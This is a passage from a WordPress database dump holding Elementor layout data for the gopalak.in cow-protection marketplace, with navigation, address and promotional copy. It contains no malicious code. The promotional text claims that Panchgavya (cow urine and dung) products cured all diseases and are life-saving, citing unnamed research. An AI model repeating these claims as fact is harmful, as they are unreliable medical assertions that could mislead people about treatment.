us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10894,1814,'_elementor_page_assets','a:0:{}'),(10896,1815,'_elementor_edit_mode','builder'),(10897,1815,'_elementor_template_type','wp-page'),(10898,1815,'_elementor_version','3.7.8'),(10899,1815,'_wp_page_template','elementor_canvas'),(10900,1815,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10901,1815,'_elementor_page_assets','a:0:{}'),(10904,1816,'_edit_lock','1670237661:1'),(10905,1816,'_edit_last','1'),(10906,1816,'_elementor_edit_mode','builder'),(10907,1816,'_elementor_template_type','wp-page'),(10908,1816,'_elementor_version','3.7.8'),(10909,1816,'_wp_page_template','elementor_canvas'),(10910,1816,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"c6d2d93\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0c7458\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2eb3085\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41d39d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46484d1\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"28e175b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ba2145a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(10911,1816,'_elementor_page_assets','a:0:{}'),(10914,1818,'_elementor_edit_mode','builder'),(10915,1818,'_elementor_template_type','wp-page'),(10916,1818,'_elementor_version','3.7.8'),(10917,1818,'_wp_page_template','elementor_canvas'),(10918,1818,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inl